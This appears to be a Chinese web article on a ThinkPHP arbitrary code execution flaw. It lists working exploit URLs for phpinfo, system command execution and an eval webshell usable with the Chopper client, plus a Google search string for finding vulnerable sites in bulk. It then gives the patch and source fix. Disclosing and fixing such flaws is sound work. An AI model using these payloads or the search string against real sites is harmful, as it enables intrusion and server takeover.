ThinkPHP框架任意代码执行漏洞的利用及其修复方法
thinkphp是国内著名的开源的php框架,是为了简化企业级应用开发和敏捷web应用开发而诞生的。最早诞生于2006年初,原名fcs,2007年元旦正式更名为thinkphp,并且遵循apache2开源协议发布。早期的思想架构来源于struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和mvc模式,融合了struts的action和dao思想和jsp的taglib(标签库)、ror的orm映射和activerecord模式, 封装了curd和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
然而近期thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(think_version)} index.php/module/aciton/param1/${@function_all()}
其中的function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()}
就可以获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_get['x'])}}?x=ls -al
可以列出网站文件列表
index.php/module/action/param1/{${eval($_post[s])}}
就可以直接执行一句话代码,用菜刀直接连接.
这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
thinkphp框架执行任意代码漏洞修复方法:
用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
将/thinkphp/lib/core/dispatcher.class.php文件中的
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
修改为:
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。
注:本文仅供学习参考使用,请不要用于非法用途。
更多关于thinkphp相关内容感兴趣的读者可查看本站专题:《thinkphp入门教程》、《thinkphp模板操作技巧总结》、《thinkphp常用方法总结》、《smarty模板入门基础教程》及《php模板技术总结》。
希望本文所述对大家基于thinkphp框架的php程序设计有所帮助。
下一篇: 兄弟喷墨机错误代码与解决